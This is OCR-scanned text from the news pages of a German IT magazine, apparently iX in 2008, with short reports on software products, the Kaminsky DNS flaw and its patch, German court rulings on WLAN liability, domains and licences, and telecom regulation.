Reinhard Fränkels und Vol- 
ker Hammers Vortrag über 
den Datenexhibitionismus und 
-missbrauch im Web 2.0 runde- 
te das Bild des veschwindenden 
Datenschutzes ab. Deprimieren- 
de Bilanz eines Jubiläums-Da- 
tenschutzkongresses. (ur) 
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MARKT + TRENDS 


Verschiedenes 


Collaboration für Sharepoint Server 


Der Microsoft-Partner Itsys- 
tems (www.itsystems.ch) hat 
nach der auf Sharepoint aufset- 
zenden intelligenten Suchlö- 
sung Matchpoint die Produkt- 
familie um einen Workspace 
erweitert. Die zentrale Colla- 
boration- und Informations- 
plattform klassifiziert automa- 
tisch die Informationen nach 
wählbaren Kriterien und soll 
auf diese Weise sicherstellen, 
dass alle Beteiligten immer auf 
dem aktuellen Stand sind. 
Dank der Portalfunktion von 
Sharepoint kann jedes Team 
seine eigene Website aufbau- 
en, auf der die Informationen 
aus unterschiedlichen Syste- 
men gemeinsam angeordnet 
werden und sich je nach An- 


forderung strukturieren lassen. 
Workspace 2008 verwaltet ne- 
ben Dokumenten und E-Mails 
auch Aufgaben, Ressourcen und 
Meetings eines Teams. Damit 
will es der Anbieter ermög- 
lichen, dass elektronische Ab- 
läufe die Projektarbeit unter- 
stützen, während im gleichen 
Umfeld auch unstrukturierte 
Teamarbeiten erledigt werden. 
Der virtuelle Arbeitsraum lie- 
fert Anbieterangaben zufolge 
alle Collaboration-Funktionen 
des Sharepoint Server und noch 
einige zusätzliche. Workspace 
lässt sich in Werkzeuge wie 
Office integrieren. 

Susanne Franke 


Eix-ink ix0808014 


Hohes Risikobewusstsein in Schwellenländern 


Führungskräfte in Unternehmen 
aus Brasilien, China, Indien und 
Südafrika glauben eher daran, 
dass Risikomanagement ihnen 
Wettbewerbsvorteile bringt als 
ihre Kollegen in Europa oder 
den USA (81 gegenüber 44 %). 
Dies belegt eine Umfrage unter 
2000 Führungskräften in zehn 
Ländern, die Datamonitor im 
Auftrag des IT-Dienstleisters 
BT Global Services durchge- 
führt hat. 

Die Unternehmen in den 
untersuchten Schwellenländern 
verfolgen auch doppelt so häu- 
fig wie die westlichen Firmen 
eine Risikomanagement-Strate- 
gie. Dagegen glauben beinahe 
40 % der deutschen Befragten, 
dass in Risikomanagement in- 


vestiertes Geld nicht notgedrun- 
gen zu geringerem Risiko führt. 
In Indien teilen diese Ansicht 
nicht einmal zehn Prozent. 

Mehr als die Hälfte der Füh- 
rungskräfte in den Schwellen- 
ländern glauben, dass Gefahren 
durch internationale Cyber- 
Spionage, Hacking oder Web- 
betrug eher von Akteuren in 
einem Entwicklungs- oder 
Schwellenland ausgehen. Laut 
BT dürfte das einer der Grün- 
de für die erhöhte Bereitschaft 
zum Risikomanagement sein. 
Denn das bietet die Chance, 
das für die Einbindung in si- 
cherheitskritische internatio- 
nale Partnerschaften nötige Ver- 
trauen aufzubauen. 

Susanne Franke 


IiX-Umfrage: Apache stellt drei 
Viertel der Intranet-Server 


Welche Webserver auf öffent- 
lich zugänglichen Websites ein- 
gesetzt werden, war schon 
Gegenstand zahlreicher Unter- 


Welche Webserver sind im Intranet Ihrer Firma 
im operativen Ensatz? 


‚Apache HTTP 64%  ] 
Microsoft IIS 1% 

Beide 13% 

Ein anderer Webserver 4% I 

Es gibt keinen & 

Intranet-Server oz | 


Gesamtstimmen: 980 (gerundet) 
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suchungen. Die dort festgestell- 
te Dominanz des Apache zeigte 
sich auch bei der iX-Umfrage 
nach firmenintern laufenden 
Intranet-Servern. Von den rund 
1000 Teilnehmern hatten 77 % 
die freie Software im Einsatz, 
28 % den IIS. Die genauen 
Zahlen sowie der Wortlaut der 
Frage sind der Grafik zu ent- 
nehmen. 


Mit Erscheinen dieser Ausgabe 
startet eine Umfrage zum Ein- 
satz von Thin Clients. 


Eix-ink ix0808014 


Update-Bedarf: 
Kritische DNS-Lücke 


Sich umgehend um die Aktua- 
lisierung ihrer DNS-Software 
kümmern sollten sich alle, die 
den Domain-Name-Service auch 
als Cache betreiben. Denn An- 
fang Juli hat der Sicherheits- 
experte Dan Kaminsky eine 
Methode entdeckt, das ohnehin 
als Schwachstelle bekannte 
Verfahren der Generierung von 
Zufallszahlen als Transaktions- 
ID systematisch auszuhebeln, 
und zwar in Produkten aller 
namhaften Anbieter. Einzelhei- 
ten will Kaminsky erst auf der 


Blackhat-Konferenz im August 
bekannt geben, doch die vorab 
informierten Hersteller von 
DNS-Software nahmen diesen 
Fehler so ernst, dass sie am 
8. Juli gemeinsam einen Patch 
veröffentlichten. Grundsätzlich 
dürfte aber nach Ansicht des 
ISC, bekannt durch seine Soft- 
ware BIND, erst der generelle 
Umstieg auf DNSSEC Abhilfe 
schaffen — ein eher lang- als 
mittelfristiges Projekt. 


Eix-ink ix0808014 


Haftung für „offenes WLAN” weiter unklar 


Mit Urteil vom 1. Juli 2008 
(Az. 11 U 52/07) hat ein Zivil- 
senat des Oberlandesgerichts 
Frankfurt am Main entschieden, 
dass der Inhaber eines Internet- 
anschlusses nicht für die unbe- 
rechtigte Nutzung seiner offe- 
nen WLAN-Verbindung durch 
Dritte einzustehen hat. 

Die Klägerin hatte anhand 
der IP-Adresse den Beklagten 
als Anbieter geschützter Musik 
angesehen und wollte ihn 
dafür belangen. Er könne in 
Anspruch genommen werden, 
weil er Sicherungsmaßnah- 
men, namentlich WPA2-Ver- 
schlüsselung, unterlassen habe. 

Nachdem das Landgericht 
der Klage zunächst stattgege- 
ben hatte, wies das Oberlan- 
desgericht sie nun ab. Den 
Richtern ging „eine uneinge- 
schränkte Haftung des WLAN- 
Anschlussinhabers deutlich ... 
(zu weit)“. Nur wenn der Be- 
klagte Prüfungspflichten ver- 
letzt hätte, käme eine Haftung 
für das Verhalten in Betracht. 
Die Richter wiesen die von der 
Klägerin für erforderlich ge- 
haltenen Sicherungsmaßnah- 


men (WPA2-Verschlüsselung) 
als „unverhältnismäßig“ zu- 
rück. 

Gegen das Urteil ist Revi- 
sion beim Bundesgerichtshof 
möglich. Eine Entscheidung 
auf höherer Ebene ist wegen 
der unterschiedlichen Rechts- 
prechung in Sachen „offenes 
WLAN“ auch dringend nötig. 

So hat das Düsseldorfer 
Landgericht Mitte Juli einstwei- 
lige Verfügungen gegen Be- 
klagte bestätigt, die ihr WLAN 
nicht gesichert hatten und über 
deren Internetzugang Songs des 
Rappers Bushido heruntergela- 
den worden waren (Az.: 12 O 
195/08). Der hatte das Verfah- 
ren wegen Urheberrechtsverlet- 
zungen angestrengt. Einer der 
Betroffenen, ein Rentner, gab 
an, nicht einmal zu wissen, wer 
Bushido überhaupt ist. 

Das Urteil des Frankfurter 
OLG widerspricht auch Ent- 
scheidungen des Landgerichts 
Hamburg, das in zwei Urteilen 
die “Mitstörerhaftung” für ein 
unverschlüsseltes WLAN be- 
jaht hatte. 

Tobias Haar/JS 


Frauen meiden weiterhin Technikberufe 


Junge Frauen entscheiden sich 
weiterhin viel zu selten für ein 
Studium oder eine Ausbildung 
im Hightech-Bereich, berichtet 
Bitkom, der Lobbyverband der 
ITK-Branche. Zwar stellten 
Studienanfängerinnen 2007 et- 
wa die Hälfte aller Erstsemes- 
ter an deutschen Hochschulen. 
In der technischen Fächergrup- 
pe Informatik, Maschinenbau 
und Elektrotechnik allerdings 


nur 16 %. Eine rühmliche Aus- 
nahme bildete nur die Mathe- 
matik mit einem Frauenanteil 
von fast 50 %. Alarmierend ist 
die sinkende Zahl von Mäd- 
chen in den IT-Berufen der 
dualen Berufsausbildung. Der 
Anteil unter den Ausbildungs- 
anfängern ist seit dem Jahr 
2002 von 14 % auf nur noch 
9 % im vergangenen Jahr ge- 
sunken. 
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MARKT + TRENDS 


Diverses 


DMMK: Soziale Netze und Bewegtbilder im Web E 5; y 


Technisch möglich: Bewegt- 
bilder in Web und Handy. 
Beliebt: Social Networks. 
Wie sich beides vermarkten 
lässt, war Thema des 16. 
Deutschen Multimedia-Kon- 
gresses in der Berliner Lan- 
desvertretung von Baden- 
Württemberg. 


Schon seit den frühen Tagen 
des Multimedia-Kongresses 
drehen sich die Inhalte ums 
Internet und dessen sich verän- 
dernde Kommunikationsstruk- 
turen. Das Internet funktioniere 
nur ohne Kontrolle, und genau 
das sei das Thema, mit dem 
sich Unternehmen und Politi- 
ker auseinandersetzen müssen. 
Darauf verwies David Wein- 
berger, Internet-Philosoph und 


Mitautor des Cluetrain-Mani- 
fests, in seiner Keynote in der 
mit 550 Teilnehmern voll be- 
setzten Landesvertretung. 

Versimpelte Bekanntmachun- 
gen und Marketing-Schleim 
wie „Ihre Antworten sind uns 
wichtig“ kommen bei vernetz- 
ten Kunden nicht mehr an und 
— schlimmer noch — behindern 
das Wirtschaftswachstum. Als 
konkrete Beispiele für eine 
Vermarktung sozialer Netzwer- 
ke stellten die Referenten Stu- 
diVZ, Welt Online und das Pla- 
tinnetz für die „Generation der 
Junggebliebenen“ vor. 

Dann das Thema Bewegtbil- 
der: Ein Sujet, das seit Jahren 
im Kommen ist, soll nun wirk- 
lich kommen. „Es war nie ein- 
facher.“ Darauf verwies Mi- 


Schnelleres Rendering mit Hypershot 1.5 


Verbessertes Raytracing in 
Echtzeit verspricht Bunkspeed 
für die Version 1.5 seines 
Renderers Hypershot. Eine im 
Cache gehaltene Bibliothek, die 
für eine sofortige Darstellung 
von Materialien sorgt, trägt 
ebenfalls zur Performancestei- 
gerung bei. Dazu kommen un- 
ter anderem Verbesserungen 
hinsichtlich der Schärfe von 
Schatten und Texturen. 

Im letzten Jahr hat Bunk- 
speed (www.bunkspeed.com) 


den neuen Renderer mit dem 
erklärten Ziel auf den Markt 
gebracht, den Anwendern eine 
interaktive Software zu bieten, 
die einfach und intuitiv zu nut- 
zen ist und keine lange Einar- 
beitungszeit verlangt. Hyper- 
shot ist für Windows- und 
Macintosh-Systeme in unter- 
schiedlichen Ausbaustufen er- 
hältlich. Die Preise liegen zwi- 
schen 195 und 3495 US-Dollar. 


Eix-ink ix0808016 


chael Wurzer, Geschäftsführer 
von Very.TV, einem Informa- 
tions- und Service-Kanal der 
hauptsächlich Berichte über 
Veranstaltungen, Medien und 
Events veröffentlicht. 

Die Produktion von Bildern 
sei ebenso einfach geworden 
wie das Publizieren. Immerhin 
sollen 60 Prozent der Deut- 
schen bis Ende 2008 Breitband- 
versorgt sein. Google soll sich 
bereits um die Rechte an der 
Übertragung der Olympischen 
Spiele 2016 beworben haben. 


Fernsehen auf Platz A 


Aber auch Filme und Live 
Streaming von sogenannten 
Laien haben ihren Charme und 
sind vor allem schnell und un- 


mittelbar. Mit leicht zu publi- 
zierenden Bewegtbildern lassen 
sich kleine Zielgruppen anspre- 
chen, für die sich ein Print-Titel 
nicht lohnen würden. 

Als Basis für diese Indivi- 
dualisierung des TV-Konsums 
verändert sich vor allem die 
Mediennutzung von Jugend- 
lichen. Auf die Frage: „Am 
wenigsten könnte ich verzich- 
ten auf‘ antworteten sie erst- 
mals mit „Computer, Internet 
und MP3-Player“ und verwie- 
sen das Fernsehen damit auf 
den sensationellen Platz vier. 

Barbara Lange 


Mehr Leben in Chat-Räumen 


Mit „Lively“ will Google 3D- 
Welten den Weg ins Web eb- 
nen. Über einen Google-Ac- 
count können Anwender aus 
einem vorgefertigten Angebot 
von Räumen, Einrichtungs- 
gegenständen und Avataren 
wählen und so einen persön- 
lichen virtuellen Raum schaf- 
fen, der als Fenster im Web- 
browser erscheint. Möglich ist 
auch das Einbinden von Fotos 
oder Videos. Ein Plug-in für 
den Internet Explorer oder Fire- 


PDF IFilter extrahiert Text und Metadaten aus PDF-Dokumenten 


Die PDFlib GmbH, München, 
hat die Version 3.0 ihrer Im- 
plementierung von Microsofts 
IFilter-Schnittstelle zur Voll- 
textindizierung vorgestellt. 
PDF IFilter basiert auf dem 
PDFlib Text Extraction Toolkit 
(TET), mit dem Anwender Text 
aus PDF-Dokumenten extrahie- 


Flash: Durch die Zusam- 
menarbeit mit Adobe können 
Google und Yahoo künftig 
alle Flash-Dateien in ihren 
Suchergebnissen führen — 
bislang konnten die Suchma- 
schinen nur statischen Text 
und Links finden. Google hat 
die Flash-Suche schon inte- 
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ren können. Darüber hinaus in- 
diziert die Software anwender- 
spezifische Metadaten, Lesezei- 
chen und Seiteneigenschaften. 
Beispielsweise lassen sich tech- 
nische Zeichnungen anhand 
interner Referenznummern fin- 
den oder Schlüsselwörter wie 
der Fotograf zur Suche ver- 


griert, Yahoo will mit der 
nächsten Version seiner Soft- 
ware nachziehen. 


Weltrekord: Mit über 

8 Millionen Downloads von 
Firefox 3 innerhalb von 24 
Stunden hat Mozilla einen 
neuen Guiness-Weltrekord 
für die meisten Software- 
Downloads aufgestellt. 


Eix-ink ix0808016 


wenden. TET PDF IFilter ist 
Thread-sicher und in 32- und 
64-Bit-Versionen verfügbar. 
Die Software lässt sich in Kom- 
bination mit diversen Micro- 
soft-Produkten, darunter dem 
Office Sharepoint oder dem Ex- 
change Server nutzen. Für den 
nichtkommerziellen Einsatz auf 


fox erlaubt die Wiedergabe auf 
einem Windows-XP- oder Vis- 
ta-Rechner. 

Avatare können sich in ver- 
schiedenen virtuellen Räumen 
bewegen, Objekte manipulie- 
ren und mit anderen Avataren 
kommunizieren. Wer will, 
kann seine VR-Welt auch über 
einen persönlichen Blog oder 
seinen Facebook-Account zu- 
gänglich machen. 


Eix-ink ix0808016 


Desktop-Systemen ist der Filter 
kostenlos. Die Lizenzgebühr 
auf einem Windows Server be- 
trägt 395 €, Desktop-Versio- 
nen für Windows 2000/XP/ 
Vista sind für 79 € zu haben 
(www.pdflib.com). 


Eix-ink ix0808016 


Subversion 1.5 erlaubt Merge Tracking 


Ein effizienteres Branch-Ma- 
nagement durch Merge Tra- 
cking gilt als eine der wichtigs- 
ten Neuerungen des verteilten 
Versionsverwaltungssystems 
Subversion. SVN 1.5 erlaubt 
außerdem den Checkout eines 
beliebigen Teilbaums (Sparse 
Checkouts), die Zusammenfas- 
sung mehrerer Objekte in einer 
Datei (Repository Sharing) und 
verbessert die Performance 


über ein Proxying-System. Un- 
ter subversion.tigris.org steht 
die neue Version zum Down- 
load zur Verfügung. Collabnet, 
Hauptsponsor des Projekts, hat 
außerdem angekündigt, seinen 
Merge Client für Eclipse und 
Microsofts Visual Studio als 
Open-Source-Software zur Ver- 
fügung zu stellen. 


Eix-ink ix0808016 
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MARKT + TRENDS 


Recht/Internet 


Data Leakage Prevention im Mailserver 


Sendmail hat die Message Pro- 
cessing Engine MPE in der 
Version 3.1 in einigen Berei- 
chen überarbeitet und erweitert. 
Die Software bildet die Grund- 
lage für die Sentrion-Applian- 
ces zum Schutz von Mail-Um- 
gebungen. Sie verwaltet das 
bidirektionale Message-Rou- 
ting und die Auslieferung der 
Nachrichten. Zu den Verbesse- 
rungen gehören nach Unterneh- 
mensangaben das Filtern von 
Spam, ein auf ausgehende 
Nachrichten erweiterter Schutz 
der Daten und eine domainbe- 
zogene Reputationsprognose. 
Hinzugekommen ist die Tech- 
nik des Dokumenten-Finger- 
printing, die es ermöglicht, in 
Dokumenten eine vollständige 
oder nur teilweise Übereinstim- 
mung mit unternehmenskriti- 


schen Inhalten zu erkennen und 
diese zu schützen. 

MPE 3.1 soll über SMTP 
hinaus auch andere Protokolle 
überwachen können, um die 
Daten aus der Kommunikation 
von HTTP Posts, Webmail, 
FTP und Instant Messaging zu 
sichern. Der Anbieter hat zu- 
dem die Sentrion-Reihe um 
zwei Appliances erweitert: 
MPV eignet sich für den Ein- 
satz in VMware-Umgebungen 
und wird als Image ausgelie- 
fert. MPQ läuft auf Blade-Ser- 
vern von Dell, ist als Basis- 
einheit mit bis zu 16 Blades 
konfiguriert, jeweils zu ver- 
gleichen mit dem Sentrion MP 
302, der bis zu 2,5 Millionen 
ein- und ausgehende E-Mails 
pro Stunde verarbeiten kann. 

Susanne Franke 


TAL-Umschaltung und Line Sharing billiger 


Die Bundesnetzagentur hat 
zum 1. Juli 2008 die einmali- 
gen Entgelte der Wettbewerber 
an die Deutsche Telekom für 
die Anmietung der Teilneh- 
meranschlussleitung (TAL) 
neu festgelegt. Dies betrifft so- 
wohl die Schaltung als auch 
die Rückgabe einer TAL. Die 
Übernahme einer TAL kostet 
künftig 35,70 Euro, wenn kei- 
ne Arbeiten beim Endkunden 
erforderlich sind, und 62,37 
Euro, wenn eine „Neuschal- 
tung der Kupferdoppelader 
Zweidraht hochbitratig“ erfol- 
gen muss. Dies bedeutet eine 
geringfügige Reduzierung der 
Entgelte. Die Deutsche Tele- 


kom hatte zunächst eine Stei- 
gerung der Entgelte um teil- 
weise mehr als 50 Prozent be- 
antragt. 

Auch die Entgelte für das 
„Line Sharing“ haben sich ge- 
ändert. Dabei werden die in 
einer Leitung genutzten Fre- 
quenzbänder geteilt. Monatlich 
muss der Wettbewerber dafür 
1,78 Euro an die Deutsche Te- 
lekom zahlen. Der Bereitstel- 
lungspreis bei Neuschaltung 
„ohne Arbeiten am Kabelver- 
zweiger und ohne Arbeiten 
beim Endkunden“ beträgt 58,98 
Euro. Die Entgelte sind jeweils 
bis Ende Juni 2010 genehmigt. 

Tobias Haar 


Neue TLDs: .meyer wird teuer 


Ende Juni hat die Internet Cor- 
poration for Assigned Names 
and Numbers (www.icann.org) 
der Einführung zahlreicher neu- 
er Top Level Domains (TLDs) 
im Internet zugestimmt. Neue 
generische (also nicht länder- 
spezifische) TLDs sollen künf- 
tig praktisch beliebige Begriffe 
enthalten dürfen. Die genauen 
Registrierungsverfahren und 
Preise stehen noch nicht fest. 
ICANN hält einige Tausend 
neue TLDs für realistisch, nicht 
jedoch, dass etwa Millionen 
von Ortsnamen im DNS direkt 
unterhalb der Root-Zone einge- 
hängt werden. 
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Markenrechtliche Überlegungen 
und das Erstellen von Regel- 
werken etwa für Einspruchs- 
und Vergleichsverfahren dürf- 
ten ICANN nun noch einige 
Zeit beschäftigen, bis .coke und 
.medonalds das Licht des Inter- 
net-Namensraums erblicken. 
Fest steht aber schon jetzt, dass 
die neuen Endungen die PR- 
Kassen deutlich stärker belasten 
werden als bisherige Domain- 
namen: Gilt es doch für die 
ICANN, Millionen an Vorlauf- 
kosten wieder hereinzuholen. In 
Aussicht stehen hohe sechsstel- 
lige Dollarbeträge pro Top Le- 
vel Domain. 


Volkswagen steht die Domain „vw.de” zu 


Schon seit Langem streitet 
Volkswagen mit dem Denic 
darum, ob es einen Anspruch 
auf Zuteilung der lediglich aus 
zwei Buchstaben bestehenden 
Second-Level-Domain „vw.de“ 
hat. Jetzt hat das Oberlandesge- 
richt Frankfurt am Main (Az. 
11 U 32/04) Volkswagen Recht 
gegeben und einen solchen An- 
spruch bejaht. 

Die Richter sehen das Denic 
aus kartellrechtlichen Gründen 
zur Registrierung dieser Do- 
main verpflichtet. Indem es 
Volkswagen dies bislang ver- 
weigerte, hat es seine markt- 
beherrschende Stellung bei der 
Vergabe von .de-Domains miss- 
braucht und Volkswagen damit 
unbillig im Geschäftsverkehr 
behindert. Dies auch deswegen, 
weil andere Automobilherstel- 
ler — die Wettbewerber von 
Volkswagen - ihre Firmenbe- 
zeichnungen ohne Weiteres als 
Domains registrieren lassen 
konnten. Als Beispiel führten 
die Richter „bmw.de“ an. 

Das Denic berief sich dar- 
auf, dass durch die Registrie- 
rung von Domains, die aus 
zwei Buchstaben bestehen, ge- 
mäß dem Request For Com- 


ments 1535, einem Dokument 
zu technischen Fragen des In- 
ternet aus dem Jahr 1993, die 
Betriebssicherheit des Internet 
gefährdet sei. Sachverständi- 
gengutachten zufolge gibt es 
solche Komplikationen tatsäch- 
lich: Version 4.8.1 der weit- 
läufig eingesetzten Resolver- 
Software BIND könnte mit 
solchen Domains Schwierig- 
keiten haben, da Rechner, die 
sich in der eigenen Second-Le- 
vel-Domain befinden, ohne ex- 
plizite Angabe der Domain oft 
nicht mehr erreichbar gewesen 
wären. 

Da mittlerweile aber nur 
noch 3,5 % der untersuchten 
Name Server diese veraltete 
Softwareversion nutzen, war 
für die Richter dieser Einwand 
widerlegt. Die Streitparteien 
waren sich mit den Richtern 
darin einig, dass es Schwierig- 
keiten mit einer Second-Level- 
Domain „vw“ nur dann geben 
könne, wenn eine Top-Level- 
Domain „.vw“ eingerichtet 
würde. Dieses Risiko sahen die 
Richter jedoch als so gering an, 
dass sie der Klage von Volks- 
wagen letztlich stattgaben. 

Tobias Haar 


Bundesnetzagentur schränkt Regulierung 
der Telekommunikation ein 


Die Bundesnetzagentur hat alle 
„interessierten Marktteilneh- 
mer“ dazu eingeladen, zum be- 
absichtigten Rückzug aus der 
Regulierung bestimmter Tele- 
kommunikationsmärkte Stel- 
lung zu nehmen. „Nachdem wir 
bereits 2006 beziehungsweise 
2007 die Märkte für Verbin- 
dungen in ausländische Fest- 
beziehungsweise Mobilfunknet- 
ze als nicht mehr regulierungs- 
bedürftig eingestuft hatten, 
wollen wir uns jetzt aus den 
Märkten für Verbindungen aus 
dem Festnetz in inländische 
Fest- und eventuell auch Mobil- 
funknetze zurückziehen“, so 
Matthias Kurth, Präsident der 
Bundesnetzagentur. Denn es 
wird „immer mehr wirksamer 
Wettbewerb zum Nutzen des 
Verbrauchers festgestellt“, so 
Kurth. 

Die Bundesnetzagentur hat 
nach ihren eigenen Angaben ei- 
nen starken Preiswettbewerb 
für Verbindungen in inländi- 
sche Festnetze festgestellt. Dies 


gilt sowohl für Pauschaltarife 
(Flatrates) als auch im Bereich 
Pre-Selection. Auch bei den 
Mobilfunkterminierungsentgel- 
ten ist nach Ansicht der Behör- 
de in absehbarer Zeit mit einer 
deutlichen Zunahme des Wett- 
bewerbs zu rechnen. 

Selbst wenn sich aber die 
Bundesnetzagentur aus der Re- 
gulierung dieser nach wie vor 
gewinnträchtigen Bereiche ver- 
abschiedet, bedeutet dies nicht, 
dass es danach keine staatliche 
Kontrolle des wettbewerbswid- 
rigen Verhaltens marktbeherr- 
schender Unternehmen, wie 
insbesondere der Deutschen 
Telekom, mehr gibt. Diese 
Überwachung wird das Bun- 
deskartellamt übernehmen. Be- 
deutsam dabei ist aber, dass 
Maßnahmen dann in der Regel 
erst im Nachhinein und nicht 
wie etwa bei der Vorabgeneh- 
migung von Entgelten durch 
die Bundesnetzagentur vor der 
jeweiligen Umsetzung erfolgt. 

Tobias Haar 
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MARKT + TRENDS 


Recht 


Einwilligung prüfen beim Adressdatenkauf 


Auch die Käufer von Adressda- 
tenbanken müssen vor jedem 
einzelnen Werbetelefonanruf 
prüfen, ob der Angerufene mit 
dem jeweiligen Anruf einver- 
standen ist. Andernfalls handelt 
es sich um unerbetene Telefon- 
anrufe, gegen die gerichtlich 
vorgegangen werden kann. Das 
hat das Landgericht Traunstein 
(Az. 7 O 318/08) entschieden. 
Im konkreten Fall hatte sich die 
Angerufene zwar früher einmal 
mit Telefon-Marketing einver- 


standen erklärt, dies bezog sich 
aber nur auf das Unternehmen, 
dem sie die Kontaktdaten gege- 
ben hatte. Von dieser Einwilli- 
gung waren weitere Anrufe 
nach Verkauf der Kontaktdaten 
nicht mehr gedeckt. Daher 
wurde das österreichische 
Unternehmen, das die Daten- 
sätze gekauft, aber nicht auf die 
Reichweite etwaiger Einwilli- 
gungen hin untersucht hatte, 
zur Zahlung einer Vertragsstra- 
fe verurteilt. Tobias Haar 


Handel mit gebrauchten 
Oracle-Lizenzen rechtswidrig 


Der Vertrieb von gebrauchten 
Oracle-Lizenzen durch die Fir- 
ma Usedsoft ist rechtswidrig. 
Das entschied das Oberlandes- 
gericht München (Az. 6 U 2759/ 
07). Nach Auffassung von Ora- 
cle hat das Urteil „weitreichen- 
de Bedeutung für den Handel 
mit gebrauchter Software“. An- 
ders sieht es der unterlegene Ge- 
brauchtsoftwarehändler. Er wähnt 
sich durch andere Gerichtsurteile 
in seinem Geschäftsmodell für 
andere Softwareprodukte auf der 
sicheren Seite. Dass nun der 
Vertrieb von Oracle-Program- 
men untersagt wurde, sieht 
Usedsoft gelassen, da das Unter- 
nehmen derzeit solche Produkte 
ohnehin nicht vertreibe. 


Der Streit darum, ob Software- 
lizenzen ohne Weiteres — ob mit 
oder ohne Zwischenhändler — 


Keine Haftung für Wikipe- 
dia: Provider sind nicht für 
die Inhalte der freien Enzy- 
klopädie verantwortlich. Das 
gilt nach einem Urteil des 
Landgerichts Hamburg auch 
dann, wenn sie automatisch 
in eine Webseite eingebun- 
den werden. 


Ebay muss 40 Millionen 
Euro Strafe zahlen: Ein 
französisches Gericht hat das 
Auktionshaus verurteilt, weil 
es zu wenig gegen den Han- 
del mit nachgemachten Mar- 
kenartikeln unternommen 
hatte. Geklagt hatte die 
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weiterverkauft werden dürfen, 
beschäftigt die (deutschen) Ge- 
richte schon eine ganze Weile. 
Die Wiederverkäufer argumen- 
tieren mit dem Erschöpfungs- 
grundsatz, wonach der Hersteller 
die Weitergabe einmal verkauf- 
ter oder anderweitig in Verkehr 
gebrachter Software nicht mehr 
kontrollieren kann, es sei denn, 
sie wird vermietet. Die Herstel- 
ler argumentieren mit den Li- 
zenzbedingungen, die insbeson- 
dere bei Volumenlizenzen eine 
Weitergabe einzelner Elemente 
des gesamten Lizenzpakets ver- 
bieten. Der Streit geht weiter. 
Auch in diesem Fall wird der 
Händler wohl vor den Bundes- 
gerichtshof ziehen. Auch Micro- 
soft & Co. werden den Fall bis 
zum Abschluss mit Spannung 
verfolgen. Tobias Haar 


LVMH-Gruppe, zu der auch 
Louis Vuitton, Christian Dior 
und Givenchy gehören. 


Standardsoftware ist „Wa- 
re“ im Steuerrecht: Sie ist 
steuerrechtlich als materielles 
Wirtschaftsgut zu behandeln, 
auch wenn es sich dabei um 
keinen „verkörperten Gegen- 
stand“ handelt. So mehrere 
Finanzgerichte zum Einkom- 
mensteuerrecht. 


Erstes Gesetz gegen Cyber- 
Mobbing: Nach dem Tod ei- 
nes 13-jährigen Mädchens in 
den USA vor zwei Jahren hat 
nun der US-Bundesstaat Mis- 
souri weltweit erstmalig ein 
Strafgesetz gegen „Online- 
Bösartigkeiten“ erlassen. 


Dynamische IP-Adresse besonders geschützt 


Das Landgericht Frankenthal 
(Az. 6 O 156/08) hat in einem 
Verfahren gegen einen Teil- 
nehmer einer Filesharing-Platt- 
form von einer Verurteilung 
abgesehen, weil die Staatsan- 
waltschaft dem Antragsteller 
die dynamische IP-Adresse des 
Antragsgegners übermittelt hat- 
te, obwohl es dafür keine ge- 
setzliche Grundlage gab. Eine 
Übermittlung von Telekommu- 
nikationsdaten durch die Diens- 
teanbieter an staatliche Behör- 
den darf nur im Rahmen der 
Ermittlung schwerer Straftaten 
erfolgen. Die hier geltend ge- 
machte Verletzung von Urhe- 
berrechten durch Filesharing 
genügt dafür nicht. 
Interessant an dieser Ent- 
scheidung ist, dass die Richter 
dynamische IP-Adressen - im 
Gegensatz zu statischen IP- 
Adressen - als Verkehrsdaten 
und nicht als Bestandsdaten 
ansehen. Diese Unterschei- 
dung ist juristisch wichtig, da 
die Verkehrsdaten unter den 
Schutz des Fernmeldegeheim- 
nisses nach Artikel 10 des 
Grundgesetzes fallen. Zu den 
Verkehrsdaten zählen bei der 


Sprachtelefonie die Rufnum- 
mer eines Anrufers und des 
angerufenen Anschlusses, Da- 
tum, Uhrzeit und Dauer der 
Verbindung sowie die Art der 
vom Teilnehmer in Anspruch 
genommenen TK-Dienste. Es 
handelt sich also um Daten, die 
sich auf einen konkreten Tele- 
kommunikationsvorgang be- 
ziehen und nicht auf den Teil- 
nehmeranschluss an sich, wie 
Name und Bankverbindung des 
TK-Nutzers. 

Da dynamische IP-Adressen 
aber eben ständig verschiede- 
nen Nutzern zugewiesen wer- 
den, handelt es sich nicht um 
Daten eines bestimmten Teil- 
nehmers, sondern nach Auffas- 
sung der Richter um Verkehrs- 
daten, die verfassungsrechtlich 
besonders geschützt sind. Ob- 
wohl der Urheberrechtsinhaber 
in diesem Fall den Verletzer 
seiner Rechte benennen konn- 
te, verlor er seinen Prozess, 
weil die Staatsanwaltschaft sich 
hier in rechtswidriger Weise 
Informationen beschafft hatte, 
die noch dazu gar nicht an den 
Kläger hätten weitergegeben 
werden dürfen. Tobias Haar 


TK-Überwachungskosten umstritten 


Telekommunikationsanbieter 
sind nach der Telekommuni- 
kations-Überwachungsverord- 
nung (TKÜV) verpflichtet, 
auf eigene Kosten Technik zur 
Überwachung von Auslands- 
telefonaten zu installieren. Das 
Verwaltungsgericht Berlin sieht 
in dieser Verpflichtung einen 
Verstoß gegen das Grundge- 
setz. Deswegen hat es ein Ge- 
richtsverfahren ausgesetzt und 
diese Frage dem Bundesverfas- 
sungsgericht zur Entscheidung 


vorgelegt. Geklagt hat ein TK- 
Anbieter, der für diese Über- 
wachung Kosten in Höhe von 
180 000 Euro pro Auslands- 
kopf für die Technik und noch 
einmal 450 000 Euro für Per- 
sonal ermittelt hat. Das Ge- 
richt schloss sich der Auffas- 
sung der Klägerin an, dass eine 
solche Pflicht nicht ohne Ent- 
schädigung eingeführt werden 
kann, ohne gegen das Grund- 
recht auf freie Berufsausübung 
zu verstoßen. Tobias Haar 


AGB ersetzt nicht Einwilligung 


Häufig finden sich in den allge- 
meinen Geschäftsbedingungen 
von Unternehmen Klauseln, die 
ihnen die Nutzung der perso- 
nenbezogenen Daten des Kun- 
den gestatten. Solche Klauseln 
genügen oft aber nicht den An- 
forderungen des Datenschutz- 
rechts. Das Landgericht Dort- 
mund (Az. 80 194/06) erklärte 
jetzt eine AGB-Klausel für 
unwirksam, die gestattete, die 
Daten seiner Kunden nach ei- 
genem Gutdünken an Dritte 


weiterzugeben. Da die Daten- 
weitergabe nicht an den Ver- 
tragszweck gebunden war, hätte 
es zu einer solchen Weitergabe 
einer wirksamen - schriftlichen 
oder, wenn ausnahmsweise er- 
laubt, elektronischen — Einwil- 
ligung bedurft. Eine Einwil- 
ligung setzt aber voraus, dass 
der Nutzer oder Kunde sie 
eindeutig und bewusst abgibt. 
